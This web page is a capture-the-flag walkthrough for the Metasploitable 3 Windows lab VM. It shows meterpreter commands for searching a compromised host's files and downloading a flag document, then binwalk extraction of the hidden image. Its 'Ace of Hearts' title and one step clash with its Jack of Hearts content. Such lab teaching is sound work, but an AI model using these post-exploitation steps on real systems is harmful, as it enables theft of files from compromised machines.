<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="description" content="Metasploitable 3 Windows - Ace of Hearts">

        <meta property="og:site_name" content="Hacker Lab Learn"/>
        <meta property="og:title" content="Ace of Hearts | Hacker Lab Learn"/>
        <meta property="og:description" content="Metasploitable 3 Windows - Ace of Hearts"/>
        <meta property="og:url" content="https://my-jigsaw-docs.com/walkthroughs/metasploitable-3-windows/jack-of-hearts"/>
        <meta property="og:image" content="/assets/img/logo.png"/>
        <meta property="og:type" content="website"/>

        <meta name="twitter:image:alt" content="Hacker Lab Learn">
        <meta name="twitter:card" content="summary_large_image">

        
        <title>Hacker Lab Learn | Ace of Hearts</title>

        <link rel="home" href="https://my-jigsaw-docs.com">
        <link rel="icon" href="/favicon.ico">

        
                    <!-- Insert analytics code here -->
        
        <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,300i,400,400i,700,700i,800,800i" rel="stylesheet">
        <link rel="stylesheet" href="/assets/build/css/main.css?id=829c17c8b6b463371e17">

            </head>

    <body class="flex flex-col justify-between min-h-screen bg-grey-lightest text-grey-darkest leading-normal font-sans">
        <header class="flex items-center shadow bg-white border-b h-24 mb-8 py-4" role="banner">
            <div class="container flex items-center max-w-4xl mx-auto px-4 lg:px-8">
                <div class="flex items-center">
                    <a href="/" title="Hacker Lab Learn home" class="inline-flex items-center">
                        <img class="h-8 md:h-10 mr-3" src="/assets/img/logo.svg" alt="Hacker Lab Learn logo" />

                        <h1 class="text-lg md:text-2xl text-blue-darkest font-semibold hover:text-blue-dark my-0 pr-4">Hacker Lab Learn</h1>
                    </a>
                </div>

                <div class="flex flex-1 justify-end items-center text-right md:pl-10">
                                    </div>
            </div>

                <button class="flex justify-center items-center bg-blue border border-blue h-10 mr-4 px-5 rounded-full lg:hidden focus:outline-none"
    onclick="navMenu.toggle()"
>
    <svg id="js-nav-menu-show" xmlns="http://www.w3.org/2000/svg"
        class="fill-current text-white h-9 w-4" viewBox="0 0 32 32"
    >
        <path d="M4,10h24c1.104,0,2-0.896,2-2s-0.896-2-2-2H4C2.896,6,2,6.896,2,8S2.896,10,4,10z M28,14H4c-1.104,0-2,0.896-2,2  s0.896,2,2,2h24c1.104,0,2-0.896,2-2S29.104,14,28,14z M28,22H4c-1.104,0-2,0.896-2,2s0.896,2,2,2h24c1.104,0,2-0.896,2-2  S29.104,22,28,22z"/>
    </svg>

    <svg id="js-nav-menu-hide" xmlns="http://www.w3.org/2000/svg"
        class="hidden fill-current text-white h-9 w-4" viewBox="0 0 36 30"
    >
        <polygon points="32.8,4.4 28.6,0.2 18,10.8 7.4,0.2 3.2,4.4 13.8,15 3.2,25.6 7.4,29.8 18,19.2 28.6,29.8 32.8,25.6 22.2,15 "/>
    </svg>
</button>

        </header>

        <main role="main" class="w-full flex-auto">
            <section class="container max-w-4xl mx-auto px-6 md:px-8 py-4">
    <div class="flex flex-col lg:flex-row">
        <nav id="js-nav-menu" class="nav-menu hidden lg:block">
            <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/getting-started"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Getting Started
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">WebGoat 8 Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/general"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            General
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-introduction"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Introduction)
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-advanced"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Advanced)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Damn Vulnerable Web App (DVWA) Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/brute-force"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Brute Force
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/command-injection"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Command Injection
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/cross-site-request-forgery"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Cross Site Request Forgery (CSRF)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Ubuntu Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/8-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            8 of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/5-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            5 of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Windows Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/king-of-diamonds"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            King of Diamonds
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/ace-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Hearts
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/jack-of-hearts"
            class="lvl1  active font-semibold text-blue nav-menu__item hover:text-blue"
        >
            Jack of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Essentials</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/essentials/scp"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            scp
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh-keygen"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh-keygen
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/browser-developer-tools"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Browser Developer Tools
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <a href="/contribute"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Contribute
        </a>
    
    </li>
    </ul>
        </nav>

        <div class="w-full lg:w-3/5 break-words pb-16 lg:pl-4" v-pre>
            <h1>Ace of Hearts</h1>
<p>1. Setup a meterpreter shell on the target system by following the same exploit used in the <a href="/walkthroughs/metasploitable-3-windows/king-of-diamonds/">King of Diamonds Walkthrough</a>.</p>
<p>2. Search for flags from the root C: directory, you'll see a lot of flags. The one we're interested in right now is the ace_of_hearts.jpg</p>
<pre><code class="language-bash">meterpreter &gt; search -f *_of_* ./
Found 61 results...
    ...plenty of results...
    c:\Program Files\OpenSSH\home\Public\Documents\jack_of_hearts.docx (676796 bytes)
   ...even more results...</code></pre>
<p>3. Download the jack of hearts.</p>
<pre><code class="language-bash">meterpreter &gt; cd OpenSSH/home/Public/Documents
meterpreter &gt; ls
Listing: C:\Program Files\OpenSSH\home\Public\Documents
=======================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2009-07-14 05:06:44 +0000  My Music
40777/rwxrwxrwx   0       dir   2009-07-14 05:06:44 +0000  My Pictures
40777/rwxrwxrwx   0       dir   2009-07-14 05:06:44 +0000  My Videos
100666/rw-rw-rw-  278     fil   2009-07-14 04:57:55 +0000  desktop.ini
100666/rw-rw-rw-  676796  fil   2019-06-02 09:36:20 +0000  jack_of_hearts.docx
100666/rw-rw-rw-  505608  fil   2019-06-02 09:36:20 +0000  seven_of_spades.pdf

meterpreter &gt; download jack_of_hearts.docx
[*] Downloading: jack_of_hearts.docx -&gt; jack_of_hearts.docx
[*] Downloaded 660.93 KiB of 660.93 KiB (100.0%): jack_of_hearts.docx -&gt; jack_of_hearts.docx
[*] download   : jack_of_hearts.docx -&gt; jack_of_hearts.docx</code></pre>
<p>4. Exit your meterpreter session by sending it to the background</p>
<pre><code class="language-bash">meterpreter &gt; background
[*] Backgrounding session 1...</code></pre>
<blockquote>
<p>Tip: You can list your sessions with background -l and connect back to that session with sessions <session-id></p>
</blockquote>
<p>5. Inspect the .docx file with binwalk.</p>
<pre><code class="language-bash">msf5 exploit(multi/http/jenkins_script_console) &gt; ls
[*] exec: ls

docker-compose.yaml
jack_of_hearts.docx
msf5 exploit(multi/http/jenkins_script_console) &gt; binwalk jack_of_hearts.docx
[*] exec: binwalk jack_of_hearts.docx

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, name: docProps/
39            0x27            Zip archive data, at least v2.0 to extract, compressed size: 448, uncompressed size: 978, name: docProps/app.xml
533           0x215           Zip archive data, at least v2.0 to extract, compressed size: 394, uncompressed size: 802, name: docProps/core.xml
974           0x3CE           Zip archive data, at least v2.0 to extract, name: word/
1009          0x3F1           Zip archive data, at least v2.0 to extract, compressed size: 1109, uncompressed size: 3175, name: word/document.xml
2165          0x875           Zip archive data, at least v2.0 to extract, compressed size: 443, uncompressed size: 1261, name: word/fontTable.xml
2656          0xA60           Zip archive data, at least v2.0 to extract, name: word/media/
2697          0xA89           Zip archive data, at least v2.0 to extract, compressed size: 97218, uncompressed size: 97394, name: word/media/image1.png
99966         0x1867E         Zip archive data, at least v1.0 to extract, compressed size: 566998, uncompressed size: 566998, name: word/media/jack_of_hearts.png
667023        0xA2D8F         Zip archive data, at least v2.0 to extract, compressed size: 932, uncompressed size: 2518, name: word/settings.xml
668002        0xA3162         Zip archive data, at least v2.0 to extract, compressed size: 3889, uncompressed size: 44241, name: word/styles.xml
671936        0xA40C0         Zip archive data, at least v2.0 to extract, name: word/theme/
671977        0xA40E9         Zip archive data, at least v2.0 to extract, compressed size: 1517, uncompressed size: 6795, name: word/theme/theme1.xml
673545        0xA4709         Zip archive data, at least v2.0 to extract, compressed size: 259, uncompressed size: 497, name: word/webSettings.xml
673854        0xA483E         Zip archive data, at least v2.0 to extract, name: word/_rels/
673895        0xA4867         Zip archive data, at least v2.0 to extract, compressed size: 256, uncompressed size: 949, name: word/_rels/document.xml.rels
674209        0xA49A1         Zip archive data, at least v2.0 to extract, compressed size: 346, uncompressed size: 1362, name: [Content_Types].xml
674604        0xA4B2C         Zip archive data, at least v2.0 to extract, name: _rels/
674640        0xA4B50         Zip archive data, at least v2.0 to extract, compressed size: 233, uncompressed size: 590, name: _rels/.rels
676774        0xA53A6         End of Zip archive, footer length: 22</code></pre>
<p>6. The .docx file looks like it's being used as a zip archive.
You can see the jack_of_hearts.png file in the word/media directory.</p>
<pre><code class="language-bash">msf5 exploit(multi/http/jenkins_script_console) &gt; binwalk -e jack_of_hearts.docx
[*] exec: binwalk -e jack_of_hearts.docx

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, name: docProps/
39            0x27            Zip archive data, at least v2.0 to extract, compressed size: 448, uncompressed size: 978, name: docProps/app.xml
533           0x215           Zip archive data, at least v2.0 to extract, compressed size: 394, uncompressed size: 802, name: docProps/core.xml
974           0x3CE           Zip archive data, at least v2.0 to extract, name: word/
1009          0x3F1           Zip archive data, at least v2.0 to extract, compressed size: 1109, uncompressed size: 3175, name: word/document.xml
2165          0x875           Zip archive data, at least v2.0 to extract, compressed size: 443, uncompressed size: 1261, name: word/fontTable.xml
2656          0xA60           Zip archive data, at least v2.0 to extract, name: word/media/
2697          0xA89           Zip archive data, at least v2.0 to extract, compressed size: 97218, uncompressed size: 97394, name: word/media/image1.png
99966         0x1867E         Zip archive data, at least v1.0 to extract, compressed size: 566998, uncompressed size: 566998, name: word/media/jack_of_hearts.png
667023        0xA2D8F         Zip archive data, at least v2.0 to extract, compressed size: 932, uncompressed size: 2518, name: word/settings.xml
668002        0xA3162         Zip archive data, at least v2.0 to extract, compressed size: 3889, uncompressed size: 44241, name: word/styles.xml
671936        0xA40C0         Zip archive data, at least v2.0 to extract, name: word/theme/
671977        0xA40E9         Zip archive data, at least v2.0 to extract, compressed size: 1517, uncompressed size: 6795, name: word/theme/theme1.xml
673545        0xA4709         Zip archive data, at least v2.0 to extract, compressed size: 259, uncompressed size: 497, name: word/webSettings.xml
673854        0xA483E         Zip archive data, at least v2.0 to extract, name: word/_rels/
673895        0xA4867         Zip archive data, at least v2.0 to extract, compressed size: 256, uncompressed size: 949, name: word/_rels/document.xml.rels
674209        0xA49A1         Zip archive data, at least v2.0 to extract, compressed size: 346, uncompressed size: 1362, name: [Content_Types].xml
674604        0xA4B2C         Zip archive data, at least v2.0 to extract, name: _rels/
674640        0xA4B50         Zip archive data, at least v2.0 to extract, compressed size: 233, uncompressed size: 590, name: _rels/.rels
676774        0xA53A6         End of Zip archive, footer length: 22</code></pre>
<p>7. From your local computer, copy down the file from you kali instance.</p>
<pre><code class="language-bash">$ scp -i ../hacker-lab hacker-lab@165.227.4.18:/home/hacker-lab/_jack_of_hearts.docx.extracted/word/media/jack_of_hearts.png ./
Enter passphrase for key '../hacker-lab':
jack_of_hearts.png</code></pre>
<p>8. And another flag!</p>
<img src="/assets/images/walkthroughs/metasploitable-3-windows/jack-of-hearts/jack_of_hearts.png">        </div>
    </div>
</section>
        </main>

        <script src="/assets/build/js/main.js?id=ba3916078c37342007f3"></script>

        <script>
    const navMenu = {
        toggle() {
            const menu = document.getElementById('js-nav-menu');
            menu.classList.toggle('hidden');
            menu.classList.toggle('lg:block');
            document.getElementById('js-nav-menu-hide').classList.toggle('hidden');
            document.getElementById('js-nav-menu-show').classList.toggle('hidden');
        },
    }
</script>

        <footer class="bg-white text-center text-sm mt-12 py-4" role="contentinfo">
            <ul class="flex flex-col md:flex-row justify-center list-reset">
                <li class="md:mr-2">
                    &copy; <a href="https://thehackerlab.co" title="The Hacker Lab website">The Hacker Lab, LLC</a> 2019.
                </li>

                <li>
                    Built with <a href="http://jigsaw.tighten.co" title="Jigsaw by Tighten">Jigsaw</a>
                    and <a href="https://tailwindcss.com" title="Tailwind CSS, a utility-first CSS framework">Tailwind CSS</a>.
                </li>
            </ul>
        </footer>
    </body>
</html>
